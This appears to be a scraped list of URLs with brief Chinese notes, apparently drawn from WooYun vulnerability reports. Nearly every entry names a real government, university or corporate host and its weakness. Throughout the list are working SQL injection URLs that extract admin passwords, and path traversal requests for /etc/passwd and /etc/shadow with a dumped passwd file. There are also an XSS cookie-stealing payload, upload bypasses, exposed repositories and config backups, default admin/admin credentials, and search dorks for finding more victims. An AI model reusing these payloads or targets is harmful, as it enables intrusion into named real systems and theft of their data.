http://60.217.72.17:7082/SysManage/CunShow.aspx?id= http://218.56.159.98:8002/SysManage/CunShow.aspx?id= http://222.134.66.54:8013/SysManage/CunShow.aspx?id= http://221.2.171.59:8100/SysManage/CunShow.aspx?id= http://222.135.76.147:8300/SysManage/CunShow.aspx?id= http://218.56.40.229:8050/SysManage/CunShow.aspx?id= http://218.56.99.84:8002/SysManage/CunShow.aspx?id= http://222.134.154.214:8002/SysManage/CunShow.aspx?id= http://www.ztehome.com.cn/,存在SQL注入。存在问题的地方: http://www.ztehome.com.cn/support/serviceSearchRslt.php?tcategory=&tsearch=1 http://218.22.27.67/Ahzrjj/index.action主页提交如下post 
http://vdisk.weibo.com/s/FqM2gASvpayTf?category_id=0&parents_ref=FqM2gASvpaz5n%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C http://www.gs9999.com/ http://drops.wooyun.org/wp-content/uploads/2014/12/细节.avi http://bbs.dospy.com http://www.ecs.cn/ http://www.qzxx.net/operationmanage/selectunitmember.aspx为例 http://www.qzxx.net/operationmanage/selectunitmember.aspx http://demo.ecs.cn/operationmanage/selectunitmember.aspx http://www.runoqd.com/index.aspx http://58.58.34.98:8096/Login.aspx http://www.cloud511.com/case http://www.smdyf.cn/getProductInfo.do?productId=148222 http://www.zjrrt.com/getProductInfo.do?productId=249209 http://www.ewj2009.com/getProductInfo.do?productId=247012 http://test1.zjtydyf.com/getProductInfo.do?productId=248254 http://www.46buy.com/getProductInfo.do?productId=243223 http://test.jhtht.com/getProductInfo.do?productId=101955 http://www.sydyf.com/getProductInfo.do?productId=14416 http://www.jylbx.com/getProductInfo.do?productId=247701 http://test.gxjjls.com/getProductInfo.do?productId=250586 http://www.hangzhoudrt.com/getProductInfo.do?productId=246206 www.zbsq.gov.cn右侧搜索处搜索 http://222.135.127.190:7000/cungk.aspx?vid=000611 http://61.133.119.187:8089/cungk.aspx?vid=001359 http://218.56.99.84:8000/cungk.aspx?vid=000330 http://123.134.189.60:8008/cungk.aspx?vid=000052 http://218.58.124.131:8002/cungk.aspx?vid=000141 http://www.zibosti.gov.cn/books/index.asp http://y.yiban.cn/phpinfo.php https://mail.cyou-inc.com http://120.35.26.113:9080/ gt.17y.com/bbs http://117.27.157.25:8090/qzbas/selectAreaInfo!listParentAreaInfo.action http://125.35.5.234:81/ URL:http://125.35.5.234:81/checkuser.asp?loginname=admin&pwd=1 http://document.thinkphp.cn/manual_3_2.html#express_query http://tbbs.haier.com/crossdomain.xml http://tbbs.haier.com/HaierBBS/test.jsp http://tbbs.haier.com/was5/web/login.jsp http://tbbs.haier.com/ http://www.nicpbp.org.cn/biaogzx/login.do?formAction=home http://**.**.**/posGate.html 
inurl:poweb http://www.xxoo.com/poweb/findisoforjson?callback=C&isbn=xxx-x-xxxx-xx&uri=www.xxoo.com/poweb&date=&_xx1418215264814=1 http://210.32.137.198/ http://210.32.137.198//findisoforjson?callb http://drops.wooyun.org/tips/3939,其中提到了mongodb一种注入方式: http://wooyun.org/bugs/wooyun-2010-086474,也从侧面印证了一个问题,这个特性(获得的GP可以是字符串也可以是数组)不仅仅是PHP存在,只要框架支持,那么就可以存在。 http://document.thinkphp.cn/manual_3_2.html#express_query http://vip.uc.cn/uvip_help/op.jsp http://www.cdws.gov.cn/web/mail_book/visitshow.asp?id=24 http://guard.qq.com/overview/o_index/xxxxx http://guard.qq.com/overview/o_index/appid http://guard.qq.com/overview/o_pg/appid intitle:FE协作办公平台5.5 http://oa.chnjcdc.com:9090/common/treeXml.jsp?type=sort&lx=3&code=1 http://oa.shunhengli.com:9090/common/treeXml.jsp?type=sort&lx=3&code=1 http://120.236.136.75/common/treeXml.jsp?type=sort&lx=3&code=1 http://fm.eyesoffice.com:9090/common/treeXml.jsp?type=sort&lx=3&code=1 http://shanxi.beijing-hualian.com:88/myup.asp http://shanxi.beijing-hualian.com:88/helps/_notes/reDuh.aspx http://rwb.whu.edu.cn/admin/Login.asp http://ceec.tju.edu.cn/zhiyao.php?id=76这个站点已经被黑了 http://ceec.tju.edu.cn/news_content.php?id=6 http://ceec.tju.edu.cn/admin/ http://www.sunnychina.com/ http://yunying.xiuzheng.cc/cp_dha.php?id=9存在sql注入,可以拿到admin的密码。并能从返回的数据库信息找到后台,拿到权限。 http://www.xiuzheng.cc/warehouse/codeview.asp?view=view,查询字符未过滤。 http://dsrs.bjdev.com.cn:9090/Default.aspx http://www.bcrj.com.cn/ http://210.30.190.28/thesis/login.jsp?user=student http://210.30.190.28 http://nuser.gongkong.com/user/Activation/2815193 http://nuser.gongkong.com/user/getmypass http://nuser.gongkong.com/user/Activation/2815190 http://nuser.gongkong.com/user/Activation/2815190 www.oss.org.cn http://yp.oss.org.cn/blog/show_resource.php?resource_id=2330 http://www.jsdtrcb.com/ http://www.jsdtrcb.com/manage/editor/db/ewebeditor.mdb http://219.234.83.2/cqds/product.php?id=3060,sqlmap直接跑出库 http://www.tstraffic.gov.cn/cyportal/TemplateImag height:20px;BORDER 
http://www.foshandb.com/article.php?id=6947 http://www.xxoo.com/manage.do?method=manage_enter http://www.xxoo.com/manage.do?method=manage&page=1&UserType=-1 http://202.197.69.15:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://lib.zust.edu.cn:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://222.29.253.58:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://rom.hztsg.com:9091/poweb/manage.do?method=manage&page=1&UserType=-1 http://211.71.202.25:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://lib.zust.edu.cn:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://210.32.33.245:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://218.58.59.71:7272/poweb/manage.do?method=manage&page=1&UserType=-1 http://210.32.205.51:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://202.112.143.51:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://210.35.35.73:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://60.214.233.173:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://210.44.1.2:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://218.192.55.9/poweb/manage.do?method=manage&page=1&UserType=-1 http://202.197.69.15:8080/poweb/manage.do?method=manage_enter http://lib.zust.edu.cn:8080/poweb/manage.do?method=manage_enter http://222.29.253.58:8080/poweb/manage.do?method=manage_enter http://rom.hztsg.com:9091/poweb/manage.do?method=manage_enter http://211.71.202.25:8080/poweb/manage.do?method=manage_enter http://lib.zust.edu.cn:8080/poweb/manage.do?method=manage_enter http://210.32.33.245:8080/poweb/manage.do?method=manage_enter http://218.58.59.71:7272/poweb/manage.do?method=manage_enter http://210.32.205.51:8080/poweb/manage.do?method=manage_enter http://202.112.143.51:8080/poweb/manage.do?method=manage_enter http://210.35.35.73:8080/poweb/manage.do?method=manage_enter http://60.214.233.173:8080/poweb/manage.do?method=manage_enter 
http://210.44.1.2:8080/poweb/manage.do?method=manage_enter http://218.192.55.9/poweb/manage.do?method=manage_enter http://lib.zust.edu.cn:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://www.juneyaoair.com/UnitOrderWebAPI/Book/GetTicketInfoByTktNo?ticketNo=018-XXXXXXXXXX http://888.sports.qq.com/tws/centerrecord/GetCenterRecord?mod=award&pagesize=10&page=0&type=jczq&days=30&_=14182187 http://www.esdjw.com.cn/ListPage.aspx?MenuID=E25F64429F304A63BDCA4A37746126C4 http://www.esdjw.com.cn/admin/UserList.aspx http://edu.baidu.com/marketing2014/SchoolResult.html http://218.27.126.42:8000/cgi/opr_login.ktcl http://218.28.166.74:8080/zzsbonline/register.jsp http://218.28.166.74:8080/zzsbonline/javascript/register/register.js http://218.28.166.74:8080/zzsbonline/secderAction!massSend?dst=手机号&msg=信息内容&time=&sender=&txt= https://**.**.**/cmkke/test2/blob/7e0b978af56c93c6ac8eb615ed67eae96bbc43fa/PospAdmin/src/.svn/text-base/config.properties.svn-base uff1ahttp://192.168.7.23:8989/POSPPG/services/autoAccountWS?WSDL uff1ahttp://192.168.7.167:8081/POSPPG/services/autoAccountWS?WSDL u5883http://192.168.7.222:8080/POSPPG/services/autoAccountWS?WSDL http://192.168.7.222:8080/POSPPG/services/autoAccountWS?WSDL http://www.e2go.com.cn/ www.e2go.com.cn)是基于长途客运联网售票系统建立的面向长途旅客的专业性门户网站。提供全北京各个长途汽车站点的网络售票服务。 http://yun.unionpay.com/Login!input.action https://github.com/cmkke/test2/blob/c1d9fc9c9210f3cc56fc801359eff60ba659690f/VAUM-WEB/WebRoot/WEB-INF/classes/constants.properties https://wallet.globebill.com http://**.**.** http://union.tiantian.com/admin.php http://www.ztehome.com.cn/存在敏感信息泄露, http://www.ztehome.com.cn/.bash_history www.baozoumanhua.com http://baozoumanhua.com/articles/帖子ID/dn http://baozoumanhua.com/articles/帖子ID/up http://baozoumanhua.com/articles/帖子ID/reward.json intitle:FE协作办公平台5.5 http://oa.chnjcdc.com:9090/security/treeXml.jsp?type=group&SG04= http://120.236.136.75/security/treeXml.jsp?type=group&SG04= 
http://123.234.131.50:9090/security/treeXml.jsp?type=group&SG04= http://fm.eyesoffice.com:9090/security/treeXml.jsp?type=group&SG04= IP:119.145.14.47:443 http://mcloud.yonyou.com/eccloud-inter/apishow!doNotNeedSession_apiMenu.do http://mcloud.yonyou.com/eccloud-inter/apishow!doNotNeedSession_apiMenu.do http://mcloud.yonyou.com/eccloud-inter/test.txt http://182.131.21.138/ccnt-apply/login_login.action http://www.strongsoft.net/ http://**.**.**/Res/CertificateFiles_ByStudents/10384/10384001/D9001223337.zip http://www.dzjpkc.qdedu.net/show.php?article_id=48 http://www.dzjpkc.qdedu.net/show.php?article_id=48 http://www.strongsoft.net/ http://220.181.185.164/.svn/entries svn://10.101.5.22/iku/src/stats/web svn://10.101.5.22/iku http://city1.jx139.com/X481d2a8318cee535096bf5f98c822c8/0/0/4/0797/index.php?module=Page&func=ClientDown&op=Detail&pid=4&v=1 www.xxx.com/do.php?act=shop_guestbook_del gd.91.com/index.php?comment-oppose https://zhishi.suning.com/zhishitang/photo/setting.jsp?custNum=5205000xxx;其中5205000xxx为用户B的id; https://github.com/andy-ruan/study/blob/1e0d3159e911b63c4534134f013e3c65da9e1656/python/python_comm/util/sendmail.py https://portal.qiyi.domain https://220.181.184.53/.svn/entries https://scm.qiyi.domain:18080/svn/portal_operation/trunk/res/public https://scm.qiyi.domain:18080/svn/portal_operation svn:special svn:externals svn:needs-lock https://portal.qiyi.domain/js/lib/fileupload/ajaxfileupload.php www.xxx.com/do.php?/do.php?act=add_transport_template www.xxx.com/do.php?act=shop_guestbook_del http://114.80.121.72/ http://114.80.121.72/ http://114.80.235.161:8083/v3/tpm-config.js http://114.80.235.161:8083/v3/sdm-config.json http://cssbeta.tudouui.com/v3 http://114.80.122.41/WEB-INF/web.xml http://114.80.122.41/WEB-INF/classes/applicationContext.xml http://114.80.122.41/WEB-INF/struts_config/struts-config-manager.xml http://**.**.**/AMRWeb/shopping/search/showSearchPage_amrshop.action www.xxx.com/do.php?act=shop_honor_update 
https://60.174.35.92/cgi/maincgi.cgi?Url=Main http://xinxigk.baodi.gov.cn/dirfirst.jsp?code=01 http://221.239.20.83/dirfirst.jsp?code=14 http://zfxxgk.bh.gov.cn/dirfirst.jsp?code=01 http://zwgk.tjhd.gov.cn:8000/dirfirst.jsp?code=01 http://222.36.5.104/dirfirst.jsp?code=01 http://gk.xq.gov.cn/dirfirst.jsp?code=02 http://60.30.65.156/dirfirst.jsp?code=03 http://xxgk.tjbc.cn/dirfirst.jsp?code=01 http://61.181.143.108/dirfirst.jsp?code=01 http://gk.tjhqqzf.gov.cn/dirfirst.jsp?code=01 http://gk.tjnk.gov.cn/dirfirst.jsp?code=01 http://218.69.106.201:8080/dirfirst.jsp?code=01 http://218.69.93.71/dirfirst.jsp?code=01 http://61.181.146.98:7002/dirfirst.jsp?code=01 http://221.122.117.196 http://test2.53kf.com/new/client.php?m=download&a=downloadFile&file=..%2F/../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin 
avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin qemu:x:101:103:qemu user:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash http://www.wooyun.org/bugs/wooyun-2014-08****/trace/ed20224abd0c36fc2f4edac5fc875ed9 http://www.wooyun.org/bugs/wooyun-2014-08****/auth/ed20224abd0c36fc2f4edac5fc875ed9 http://live.findlaw.cn/iframe/zhishizhuanli_ask.php?sid2=31 http://bbs.english.sina.com http://www.80vul.com/dzvul/sodb/19/sodb-2010-01.txt http://csir.whu.edu.cn/右侧搜索,看到有两个GET参数,其中参数searchkey未过滤导致SQL注入。 http://caipiao.taobao.com/lottery/seek/seekResponsePage.htm?seekId=10000001 http://caipiao.taobao.com/lottery/seek/seekResponsePage.htm?seekId=10000002 http://caipiao.taobao.com/lottery/seek/seekResponsePage.htm?seekId=10655001 http://www.mszhuanzhuan.com/app.zip http://101.95.48.76/biz/netplan/poi/hotArea!selectHotArea.action?page=/biz/netplan/coverBase/showNearSite.free&maintenances=&address=fsdsfdsf&types=&siteName= http://tdlz.nanning.gov.cn/ExtWebModels/WebFront/ShowNewsList.aspx?class=100005 http://demo.inongyou.cn/ExtWebModels/WebFront/ShowNewsList.aspx?class=100005 http://rctdlz.cn/ExtWebModels/WebFront/ShowNewsList.aspx?class=100007 http://demo9.nongyou.cn/ExtWebModels/WebFront/ShowNewsList.aspx?class=100013 http://demo2.sdhzs.com/ShowNewsList.aspx?class=1000100004 http://demo.caeo.cn/ExtWebModels/WebFront/ShowNewsList.aspx?class=100001 http://221.2.162.243:8044/ExtWebModels/WebFront/ShowNewsList.aspx?class=100002 http://121.17.2.52/ExtWebModels/WebFront/ShowNewsList.aspx?class=100006 http://222.135.127.190:8001/ShowNewsList.aspx?class=100001 http://61.186.154.210:8088/ShowNewsList.aspx?class=1000100002 http://www.nongyou.com.cn/ http://tdlz.nanning.gov.cn/ExtWebModels/WebFront/ShowNews.aspx?class=100005&id=1000100279 http://121.17.2.52/ExtWebModels/WebFront/ShowNews.aspx?class=100006&id=1000100344 
http://rctdlz.cn/ExtWebModels/WebFront/ShowNews.aspx?class=100007&id=1000100486 http://demo9.nongyou.cn/ExtWebModels/WebFront/ShowNews.aspx?class=100013&id=1000100016 http://demo2.sdhzs.com/ShowNews.aspx?class=1000100004&id=1000100239 http://222.135.127.190:8001/ShowNews.aspx?class=100001&id=1000100372 http://221.1.104.11:8011/ExtWebModels/WebFront/ShowNews.aspx?class=100001&id=1000100307 http://61.186.154.210:8088/ShowNews.aspx?class=1000100002&id=1000100247 http://121.17.2.52:9999/ExtWebModels/WebFront/ShowNews.aspx?class=100001&id=1000100469 http://cemlab.uestc.edu.cn/admin/Session.asp http://124.128.34.217/Secure/Login.aspx http://210.41.193.86/zzadmin/admin.php/Index/index https://app.asana.com http://oldsp.hengyang.gov.cn/OnlineQuery/QueryDetail.aspx?QueryId=2085 http://bbs.coolpad.com/config/config_global.php.bak http://106.37.195.128:8888/ http://106.37.195.129/ https://www.ucfpay.com/member/valiPwd/download?fileName=../../../../../../../../../../etc/passwd https://www.ucfpay.com/member/valiPwd/download?fileName=../../../../../../../../../../etc/shadow http://www.zjlib.cn:8282/zjlib/page/newstext.jsp?newsid=70 http://temai.minshengec.com/ http://xqmobile.minshengec.com/productionport/preorderreview.jhtml?token=b457cb697e63c64beb537ad4e88a90ce×tamp=1417658530&loginToken=0dce8a6dece60e266ca026e71ad0f820&jsons={%22productArray%22%3A[{%22productId%22%3A%2220%22%2C%22sellNum%22%3A%222%22}]}&cyId=130 http://xqmobile.minshengec.com/javax.faces.resource.../WEB-INF/web.xml.jsf http://www.hvett.com.cn/index.php/portal/index/classdetail?class_id=1841&cid=6&leftmenuid=1 http://cie.zjgsu.edu.cn/ciecol/web/teacher_detail.jsp?id=114 http://www.55.la/run/ding_qq.php?bid=27 http://www.55.la/run/ding_logo.php?bid=696 http://www.55.la/run/ding_weblogo.php?bid=5292 http://www.zbcdc.com/info_Print.asp?ArticleID=214 http://183.62.26.11/ http://www.chinaecity.cn/ http://www.chinaecity.cn:80/ www.chinaecity.cn http://tijianzhan.nwpu.edu.cn/ 
http://cqjtfk.bypay.cn/wapTrans!seaFiOrder.ac http://www.wdhac.com.cn/xml/Cms_XML_GBK.jsp?optionalparam=-1&cf=3467&randomId=0.9538818406872451&actiontype=1&id=1201 http://**.**.**/_ http://www.clcn.net.cn/modules/guide/index.php?page_id=53 http://store.tdxinfo.com/tops-front-purchaser/order/flight/international/listOrder https://github.com/JeffXue/performance_monitor/blob/b49195e886ee5a6e3f625bb03c0d4b985f0b55ab/conf/Email.ini http://mail.gionee.com www.fxtiyu.com主站 http://114.247.0.103:8080/bill/d.h?attrs=XXXXXXXX http://zhlzh.mofcom.gov.cn/entp_user.jsp http://hvsop.youku.com/player.php?id=16 http://hvsop.youku.com/admin/ http://hvsop.youku.com/admin/_validate.php http://hvsop.youku.com/admin http://hvsop.youku.com/test/list.php?music=1 http://hvsop.youku.com//test/player.php?id=1 https://skydoc.baosteel.com/ http://115.239.167.194/setsys_backup.htm http://wcjy.zhjedu.cn/ http://static.wooyun.org/drops/20141124/201411241754IconDos.apk https://github.com/liu21st/thinkphp/commit/23c6e130ce75f2132e5b48699363a75ed28e15b2 http://jy.bucm.edu.cn/unitService/unit-register.action http://170web.com/cases_01.html http://e-ton.cn/data/%23data.mdb http://wasai.yy.com/admin/ http://wasai.yy.com/wsadm http://wasai.yy.com/super/login.html?r=/admin/ http://wasai.yy.com/wsadm。。。。会自动请求admin页。 http://wasai.yy.com/userInfoReq_s?json={%22UserInfoReq%22:{%22uid%22:0}}&_=1418196227753 http://wasai.yy.com/wl http://m.dfss.com.cn/dfssclient/DatingCarSearch.aspx?fchrWeiXinName=XX微信IDXX Version:4.0.30319 Version:4.0.30319.1 http://www.zhbj.gov.cn/zixunlook.aspx?bianma=05 http://sqlmap.org http://www.the365.com.cn:18801/web.rar https://115.182.208.54/RDWeb/Pages/zh-CN/login.aspx https://115.182.208.54/RDWeb/Pages/zh-CN/login.aspx https://115.182.208.54/RDWeb/Pages/zh-CN/login.aspx http://180.153.25.224/WeixinManagerWEB/Account/Login.aspx http://180.153.25.224/WeixinManagerWEB/weixinUser/UserManager.aspx http://tcm.iquanyou.com.cn/tcm/userLogin.action 
http://tcm.iquanyou.com.cn/tcm/frameLogin.jsp jdbc:mysql://192.168.14.132:3306/c jdbc:oracle:thin:@10.10.0.156:1521:tcm jdbc:oracle:thin:@10.10.0.57:1521:tcm jdbc:mysql://localhost:3306/mixca http://user.quanyou.com.cn/CardServer.wsdl http://gonggao.org.cn:18082/EBase/login/login.action行 http://monitor.minshengec.cn/cacti/index.php http://www.skyworth-ea.com/cn/product/productdetail.aspx?id=10000011734487 http://www.skyworth-ea.com/sysadmin/login.aspx http://hr.skyworth.com/jobadmin/FCKeditor/editor/filemanager/connectors/test.html https://58.248.49.138 http://exhibitcar.tudou.com/ http://www.74cms.com; http://hao.mumayi.cn/ http://hao.mumayi.cn/Adminlogin/Login http://hao.mumayi.cn/Adminlogin/Login http://www.lianyisoft.com/ http://tzgl.ynjy.cn/ http://hainan.zbglxt.com/ http://jx.lianyisoft.com/ http://hunan.lianyisoft.com/ http://sx.lianyisoft.com/ http://zbtj.hyedu.net.cn/ http://218.76.27.45:8062/ http://sc.zbglxt.com/ http://henan.zbglxt.com/ http://hb.zbglxt.com/ http://qh.zbglxt.com/ http://ah.zbglxt.com/ http://u.mumayi.com/?a=retrievepass http://www.yungoucms.cn/go/shaidan/detail/10 http://dev.mumayi.com/ http://dev.mumayi.com/index/login?username=test&password=test&logintype=0 http://dev.mumayi.com/index/login?username=test&password=test&logintype=0 inurl:showcareer.asp?id= http://www.lelegq.com/showcareer.asp?id=7 http://wengine.net/showcareer.asp?id=14 http://www.zbweiqi.com/showcareer.asp?id=9 http://www.yc600.cn/showcareer.asp?id=7 http://www.szxbjy.com/showcareer.asp?id=10 http://bdfz.com.cn/showcareer.asp?id=11 http://www.zhhhljy.com/showcareer.asp?id=12 http://www.hk-hanshi.com/showcareer.asp?id=12 http://www.hzjbyy.com/showcareer.asp?id=12 http://www.ydmedu.com/showcareer.asp?id=8 http://www.ydmedu.com/showcareer.asp?id=8 http://www.xiaolv.org/showcareer.asp?id=8 http://www.hssjy.com/showcareer.asp?id=8 http://jhhmby.com/showcareer.asp?id=7 http://www.hcwsg.com/showcareer.asp?id=8 http://www.guizhishen.cn/showcareer.asp?id=15 
http://jyembed.com/showcareer.asp?id=13 http://www.acl56.com/showcareer.asp?id=10 http://www.jmxjjb.com/showcareer.asp?id=12 http://www.yjcjy.com/showcareer.asp?id=9 http://bbs.midea.com/ http://bbs.midea.com/bbs/config/config_global.php_bak http://www.ymatou.com/BuyerOrder/BuyerChangeAddress?orderId=102385600 http://www.zalvyou.com/ http://qing.shopping365.net/ http://www.czdfgl.com/ http://www.6028808.net/ http://www.gamekin.cn/ http://qing.shopping365.net/19/new_list.asp?sid=10 http://www.zalvyou.com/new_list.asp?sid=10 http://www.czdfgl.com/new_list.asp?sid=10 http://www.6028808.net/new_list.asp?sid=10 http://www.gamekin.cn/gk2/new_list.asp?sid=10 http://appbox.bbn.com.cn/appBoxN/servlet/Select?id=1&listName=e&t=1418457294062&userlogin=admin http://appbox.bbn.com.cn/appBoxN/servlet/netDisk?act=queryUserDisk&t=1418457298234&userId=-1 http://ecampus.sysu.edu.cn/zsuoa/vfs?path=../../../../../../etc/passwd http://xpb.ecjtu.jx.cn/后台弱口令,已被黑客拿webshell http://xpb.ecjtu.jx.cn/,一看,是织梦cms http://xpb.ecjtu.jx.cn/dede/ http://170web.com/ http://mastino.com.cn/contact.asp http://mastino.com.cn/prodetail.asp?id=52 http://mastino.com.cn/newsdetail.asp https://localhost/src/login.php?action_c=login&user_type=1&user=admin&pass=admin&nodeid=1 encoding:utf-8 http://tuchong.com inurl:products.asp?prolenid= inurl:product.asp?smtid= http://www.huquan.com//admin/upfile_flash.asp http://www.kwauto.com.cn//admin/upfile_flash.asp http://www.jindashebei.com//admin/upfile_flash.asp http://www.gdfupin.org.cn/web2//admin/upfile_flash.asp http://www.qile168.com//admin/upfile_flash.asp http://www.szdse.com//admin/upfile_flash.asp http://www.qfdns.net/ http://www.nxjxtfkt.com/ProView.Asp?ID=202%20union%20select%201,2,3,username,5,6,7,8,9,10,11,12,13,password,15%20from%20admin http://www.nxzxzs.com/ProView.Asp?ID=202%20union%20select%201,2,3,username,5,6,7,8,9,10,11,12,13,password,15%20from%20admin 
http://www.nxjxbz.com/ProView.Asp?ID=202%20union%20select%201,2,3,username,5,6,7,8,9,10,11,12,13,password,15%20from%20admin http://www.ystnz88.com/ProView.Asp?ID=202%20union%20select%201,2,3,username,5,6,7,8,9,10,11,12,13,password,15%20from%20admin http://wooyun.org/bugs/wooyun-2014-086690 http://bbs.haier.com/ http://www.freebuf.com/wp-admin/edit.php?post_type=post&author=001 http://www.xinhaisoft.com/ http://www.xinhaisoft.com/CustomerList.aspx http://www.xinhaisoft.com http://soft.psy.com.cn/2012/bistu//inc/upload.asp?fl=1.asp;1 http://www.jsgyzx.net/xinhaisoft//inc/upload.asp?fl=1.asp;1 http://psyhealth.must.edu.mo//inc/upload.asp?fl=1.asp;1 http://xinli.jlbtc.edu.cn/inc/upload.asp?fl=1.asp;1 http://www.jsgyzx.net/xinhaisoft//inc/upload.asp?fl=1.asp;1 http://www.pdyz.qdedu.net/xinli//inc/upload.asp?fl=1.asp;1 http://www1.avceit.cn/xinhaisoft//inc/upload.asp?fl=1.asp;1 http://www.hnpolice.com/xlzx//inc/upload.asp?fl=1.asp;1 http://xlzx.scun.edu.cn//inc/upload.asp?fl=1.asp;1 http://fshyschool.net/xinli//inc/upload.asp?fl=1.asp;1 http://61.49.8.153/inc/upload.asp?fl=1.asp;1 http://**.**.**/benefit/sysarticle.aspxarcid=121 http://**.**.**/Hlr/login.aspx www.xauat.edu.cn http://123.134.189.60:8013/WebDefault.aspx?CountryName=%e9%9b%aa%e9%87%8e%e6%97%85%e6%b8%b8%e5%8c%ba&level=0 http://218.56.40.229:8001/WebDefault.aspx?CountryName=%e7%83%9f%e5%8f%b0%e5%b8%82&level=0 http://218.58.124.131:8003/WebDefault.aspx?CountryName=%e9%ab%98%e6%96%b0%e5%8c%ba&level=1 http://222.134.154.214:8001/WebDefault.aspx?CountryName=%e5%8d%97%e9%ba%bb%e9%95%87&level=2 http://222.135.109.70:8200/WebDefault.aspx?CountryName=%e6%96%87%e7%99%bb%e5%b8%82&level=1 http://221.2.149.47:8200/WebDefault.aspx?CountryName=%e8%8d%ab%e5%ad%90%e9%95%87&level=2 http://111.17.169.213:801/WebDefault.aspx?CountryName=%e5%bc%a0%e5%ba%97%e5%8c%ba&level=0 http://jwh.tanljgzx.gov.cn/WebDefault.aspx?CountryName=%e6%b3%b0%e5%ae%89%e5%b8%82&level=0 
http://61.133.119.187:8091/WebDefault.aspx?CountryName=%e9%ab%98%e6%8a%80%e5%8c%ba&level=1 http://218.56.99.84:8003/WebDefault.aspx?CountryName=%e6%98%86%e4%bb%91%e9%95%87&level=2 http://ndxl.ncu.edu.cn/PsyAssociation/ActivityView.aspx?id=46 http://ndxl.ncu.edu.cn/PsyAssociation/ActivityView.aspx?id=46’ http://ndxl.ncu.edu.cn/PsyAssociation/ActivityView.aspx?id=46 http://ndxl.ncu.edu.cn/PsyAssociation/ActivityView.aspx?id=46 http://sso1.nlc.gov.cn/ReadPortal/rdRegisterF.jsp http://www.aqgjj.cn/jj_show.asp?id=286 cn:8735 http://hi.liebao.cn:8735 http://updatecenter.qq.com/queryselfupdate url:http://124.227.14.248:8081/manager/html user:admin http://124.227.14.248:8081/JDMP/ user:admin pass:admin http://laser.tju.edu.cn/phpmyadmin/ http://www.china-crc.com.cn/index.php/news/detail/pid/03/articleid/431 http://www.china-crc.com.cn/index.php/news/detail/pid/03/articleid/431%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20from%20information_schema.SCHEMATA http://www.china-crc.com.cn/index.php/news/detail/pid/03/articleid/428%20and%201=2%20union%20select%201,2,3,4,5,SCHEMA_NAME,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20from%20information_schema.SCHEMATA%20limit%201,1-- http://www.china-crc.com.cn/web.zip http://119.188.6.230:8080/dl/download.doc存在struts2漏洞 site:cup.edu.cn filetype:xls http://menhu.cup.edu.cn/puservice/task.s?action=download&userId=xxx http://menhu.cup.edu.cn/sso/index!loadType.action?username=xxx http://menhu.cup.edu.cn/puservice/task.s?action=findUserDetailsInfo&ICMS_SSO_USER_TOKEN=xxx http://menhu.cup.edu.cn/sso/index!load.action?appCode=ICMS http://www.cup.edu.cn http://oa.cup.edu.cn/ http://202.204.193.215/Zxmhlogin.jsp http://localhost:8080/rams/index.jsp http://gmis.cup.edu.cn/pyxx/logindd.aspx http://gmis.cup.edu.cn/gmis/logindd.aspx http://202.204.201.35:8088/business/login.do http://menhu.cup.edu.cn/sso/consSite/consSite.html 
